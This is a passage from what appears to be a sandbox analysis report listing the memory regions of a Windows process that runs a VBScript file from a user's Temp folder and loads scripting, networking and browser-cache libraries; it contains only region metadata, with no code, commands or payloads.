entry_point = 0x75040000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll")
Region:
id = 2351
start_va = 0x22b0000
end_va = 0x22effff
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 2352
start_va = 0x28c0000
end_va = 0x29bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 2353
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 2354
start_va = 0x751f0000
end_va = 0x75202fff
entry_point = 0x751f0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 2355
start_va = 0xa0000
end_va = 0xa0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 2356
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 2357
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 2358
start_va = 0x74fd0000
end_va = 0x7503afff
entry_point = 0x74fd0000
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll")
Region:
id = 2359
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x270000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 2360
start_va = 0x75cc0000
end_va = 0x75cecfff
entry_point = 0x75cc0000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 2361
start_va = 0x76330000
end_va = 0x7644cfff
entry_point = 0x76330000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 2362
start_va = 0x77800000
end_va = 0x7780bfff
entry_point = 0x77800000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 2363
start_va = 0x750e0000
end_va = 0x750f5fff
entry_point = 0x750e0000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 2364
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2365
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2366
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2367
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2368
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2369
start_va = 0x750a0000
end_va = 0x750dafff
entry_point = 0x750a0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 2370
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x270000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 2371
start_va = 0x4f0000
end_va = 0x52ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 2372
start_va = 0x540000
end_va = 0x57ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 2373
start_va = 0x29d0000
end_va = 0x2acffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029d0000"
filename = ""
Region:
id = 2374
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 2375
start_va = 0x74fc0000
end_va = 0x74fc7fff
entry_point = 0x74fc0000
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll")
Region:
id = 2376
start_va = 0x2ad0000
end_va = 0x2ecffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ad0000"
filename = ""
Region:
id = 2377
start_va = 0x280000
end_va = 0x280fff
entry_point = 0x280000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 2378
start_va = 0x280000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 2379
start_va = 0x2f20000
end_va = 0x301ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f20000"
filename = ""
Region:
id = 2380
start_va = 0x74fa0000
end_va = 0x74fb5fff
entry_point = 0x74fa0000
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll")
Region:
id = 2381
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 2382
start_va = 0x75100000
end_va = 0x75183fff
entry_point = 0x75100000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 2383
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 2384
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2385
start_va = 0x3020000
end_va = 0x315ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003020000"
filename = ""
Region:
id = 2386
start_va = 0x74b80000
end_va = 0x74bacfff
entry_point = 0x74b80000
region_type = mapped_file
name = "scrobj.dll"
filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll")
Region:
id = 2387
start_va = 0x270000
end_va = 0x27ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 2388
start_va = 0x27a0000
end_va = 0x289ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 2389
start_va = 0x74b50000
end_va = 0x74b70fff
entry_point = 0x74b50000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 2390
start_va = 0x74b30000
end_va = 0x74b41fff
entry_point = 0x74b30000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")
Region:
id = 2391
start_va = 0x74b00000
end_va = 0x74b29fff
entry_point = 0x74b00000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 2392
start_va = 0x74490000
end_va = 0x745c2fff
entry_point = 0x74490000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 2393
start_va = 0x370000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 2394
start_va = 0x3160000
end_va = 0x32effff
entry_point = 0x0
region_type = private
name = "private_0x0000000003160000"
filename = ""
Region:
id = 2395
start_va = 0x32f0000
end_va = 0x345ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032f0000"
filename = ""
Region:
id = 2396
start_va = 0x3460000
end_va = 0x367ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003460000"
filename = ""
Region:
id = 2397
start_va = 0x3020000
end_va = 0x310ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003020000"
filename = ""
Region:
id = 2398
start_va = 0x3150000
end_va = 0x315ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003150000"
filename = ""
Region:
id = 2399
start_va = 0x3680000
end_va = 0x387ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003680000"
filename = ""
Region:
id = 2400
start_va = 0x3160000
end_va = 0x329ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003160000"
filename = ""
Region:
id = 2401
start_va = 0x32b0000
end_va = 0x32effff
entry_point = 0x0
region_type = private
name = "private_0x00000000032b0000"
filename = ""
Region:
id = 2402
start_va = 0x22f0000
end_va = 0x23affff
entry_point = 0x22f0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 2403
start_va = 0x3880000
end_va = 0x3c7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003880000"
filename = ""
Region:
id = 2404
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x2c0000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll")
Region:
id = 2405
start_va = 0x3090000
end_va = 0x30cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 2406
start_va = 0x30d0000
end_va = 0x310ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030d0000"
filename = ""
Region:
id = 2407
start_va = 0x34d0000
end_va = 0x35cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000034d0000"
filename = ""
Region:
id = 2408
start_va = 0x3640000
end_va = 0x367ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003640000"
filename = ""
Region:
id = 2409
start_va = 0x7efa7000
end_va = 0x7efa9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 2410
start_va = 0x75350000
end_va = 0x7535dfff
entry_point = 0x75350000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 2412
start_va = 0x580000
end_va = 0x5a7fff
entry_point = 0x580000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 2413
start_va = 0x5e0000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2414
start_va = 0x3180000
end_va = 0x31bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003180000"
filename = ""
Region:
id = 2415
start_va = 0x3260000
end_va = 0x329ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003260000"
filename = ""
Region:
id = 2416
start_va = 0x3680000
end_va = 0x377ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003680000"
filename = ""
Region:
id = 2417
start_va = 0x3840000
end_va = 0x387ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003840000"
filename = ""
Region:
id = 2418
start_va = 0x3c80000
end_va = 0x3d7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c80000"
filename = ""
Region:
id = 2419
start_va = 0x7efa1000
end_va = 0x7efa3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 2420
start_va = 0x7efa4000
end_va = 0x7efa6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 2421
start_va = 0x75ac0000
end_va = 0x75bf5fff
entry_point = 0x75ac0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 2422
start_va = 0x77920000
end_va = 0x77a14fff
entry_point = 0x77920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 2423
start_va = 0x767e0000
end_va = 0x769dafff
entry_point = 0x767e0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 2424
start_va = 0x2d0000
end_va = 0x2d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002d0000"
filename = ""
Region:
id = 2425
start_va = 0x74960000
end_va = 0x74afdfff
entry_point = 0x74960000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2426
start_va = 0x2e0000
end_va = 0x2e0fff
entry_point = 0x2e0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2427
start_va = 0x370000
end_va = 0x371fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000370000"
filename = ""
Region:
id = 2428
start_va = 0x390000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2429
start_va = 0x2e0000
end_va = 0x2e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 2430
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 2431
start_va = 0x380000
end_va = 0x38bfff
entry_point = 0x380000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 2432
start_va = 0x3d0000
end_va = 0x3d7fff
entry_point = 0x3d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 2433
start_va = 0x3e0000
end_va = 0x3effff
entry_point = 0x3e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 2434
start_va = 0x76450000
end_va = 0x76484fff
entry_point = 0x76450000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 2435
start_va = 0x77df0000
end_va = 0x77df5fff
entry_point = 0x77df0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 2436
start_va = 0x3d80000
end_va = 0x3efffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 2437
start_va = 0x74d00000
end_va = 0x74d43fff
entry_point = 0x74d00000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 2438
start_va = 0x32f0000
end_va = 0x340ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032f0000"
filename = ""
Region:
id = 2439
start_va = 0x3420000
end_va = 0x345ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003420000"
filename = ""
Region:
id = 2440
start_va = 0x74ce0000
end_va = 0x74cfbfff
entry_point = 0x74ce0000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 2441
start_va = 0x74f80000
end_va = 0x74f86fff
entry_point = 0x74f80000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")
Region:
id = 2442
start_va = 0x5b0000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2443
start_va = 0x74c80000
end_va = 0x74cd1fff
entry_point = 0x74c80000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")
Region:
id = 2444
start_va = 0x74c60000
end_va = 0x74c74fff
entry_point = 0x74c60000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")
Region:
id = 2445
start_va = 0x74c50000
end_va = 0x74c5cfff
entry_point = 0x74c50000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")
Region:
id = 2446
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2447
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 2448
start_va = 0x74c40000
end_va = 0x74c45fff
entry_point = 0x74c40000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll")
Region:
id = 2449
start_va = 0x2250000
end_va = 0x228ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002250000"
filename = ""
Region:
id = 2450
start_va = 0x3320000
end_va = 0x335ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003320000"
filename = ""
Region:
id = 2451
start_va = 0x33d0000
end_va = 0x340ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000033d0000"
filename = ""
Region:
id = 2452
start_va = 0x3f30000
end_va = 0x402ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003f30000"
filename = ""
Region:
id = 2453
start_va = 0x4040000
end_va = 0x413ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004040000"
filename = ""
Region:
id = 2454
start_va = 0x74c00000
end_va = 0x74c3bfff
entry_point = 0x74c00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 2455
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 2456
start_va = 0x7ef9e000
end_va = 0x7efa0fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 2457
start_va = 0x74bf0000
end_va = 0x74bf4fff
entry_point = 0x74bf0000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 2458
start_va = 0x75a00000
end_va = 0x75a02fff
entry_point = 0x75a00000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll")
Region:
id = 2459
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 2460
start_va = 0x74be0000
end_va = 0x74beffff
entry_point = 0x74be0000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 2461
start_va = 0x4140000
end_va = 0x42fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004140000"
filename = ""
Region:
id = 2462
start_va = 0x3d80000
end_va = 0x3ebffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 2463
start_va = 0x3ec0000
end_va = 0x3efffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ec0000"
filename = ""
Region:
id = 2464
start_va = 0x31c0000
end_va = 0x325ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031c0000"
filename = ""
Region:
id = 2465
start_va = 0x74bd0000
end_va = 0x74bd5fff
entry_point = 0x74bd0000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 2466
start_va = 0x2ee0000
end_va = 0x2f1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ee0000"
filename = ""
Region:
id = 2467
start_va = 0x31c0000
end_va = 0x325efff
entry_point = 0x0
region_type = private
name = "private_0x00000000031c0000"
filename = ""
Region:
id = 2468
start_va = 0x41a0000
end_va = 0x429ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000041a0000"
filename = ""
Region:
id = 2469
start_va = 0x42f0000
end_va = 0x42fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000042f0000"
filename = ""
Region:
id = 2470
start_va = 0x7ef98000
end_va = 0x7ef9afff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 2471
start_va = 0x74830000
end_va = 0x74879fff
entry_point = 0x74830000
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 2472
start_va = 0x3020000
end_va = 0x307ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003020000"
filename = ""
Region:
id = 2473
start_va = 0x3e60000
end_va = 0x3e9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003e60000"
filename = ""
Region:
id = 2474
start_va = 0x3eb0000
end_va = 0x3ebffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003eb0000"
filename = ""
Region:
id = 2475
start_va = 0x74750000
end_va = 0x747c7fff
entry_point = 0x74750000
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2476
start_va = 0x73db0000
end_va = 0x7435afff
entry_point = 0x73db0000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 2477
start_va = 0x74900000
end_va = 0x74959fff
entry_point = 0x74900000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll")
Region:
id = 2480
start_va = 0x73800000
end_va = 0x73daafff
entry_point = 0x73800000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 2481
start_va = 0x74bb0000
end_va = 0x74bbffff
entry_point = 0x74bb0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")
Region:
id = 2482
start_va = 0x74bc0000
end_va = 0x74bc7fff
entry_point = 0x74bc0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll")
Region:
id = 2483
start_va = 0x748e0000
end_va = 0x748f1fff
entry_point = 0x748e0000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll")
Region:
id = 2484
start_va = 0x748d0000
end_va = 0x748d7fff
entry_point = 0x748d0000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll")
Region:
id = 2485
start_va = 0x748c0000
end_va = 0x748c5fff
entry_point = 0x748c0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 2486
start_va = 0x74360000
end_va = 0x74458fff
entry_point = 0x74360000
region_type = mapped_file
name = "msado15.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll")
Region:
id = 2487
start_va = 0x74810000
end_va = 0x7482efff
entry_point = 0x74810000
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\SysWOW64\\msdart.dll" (normalized: "c:\\windows\\syswow64\\msdart.dll")
Region:
id = 2488
start_va = 0x3780000
end_va = 0x381ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003780000"
filename = ""
Region:
id = 2489
start_va = 0x74880000
end_va = 0x748b7fff
entry_point = 0x74880000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 2490
start_va = 0x3d80000
end_va = 0x3e1efff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 2491
start_va = 0x44a0000
end_va = 0x44dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000044a0000"
filename = ""
Region:
id = 2492
start_va = 0x4300000
end_va = 0x43fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 2505
start_va = 0x580000
end_va = 0x58bfff
entry_point = 0x580000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 2506
start_va = 0x3370000
end_va = 0x33affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003370000"
filename = ""
Region:
id = 2507
start_va = 0x4600000
end_va = 0x46fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 2508
start_va = 0x75470000
end_va = 0x75564fff
entry_point = 0x75470000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 2509
start_va = 0x7ef95000
end_va = 0x7ef97fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 2510
start_va = 0x590000
end_va = 0x591fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000590000"
filename = ""
Region:
id = 2511
start_va = 0x75420000
end_va = 0x7546bfff
entry_point = 0x75420000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 2512
start_va = 0x738e0000
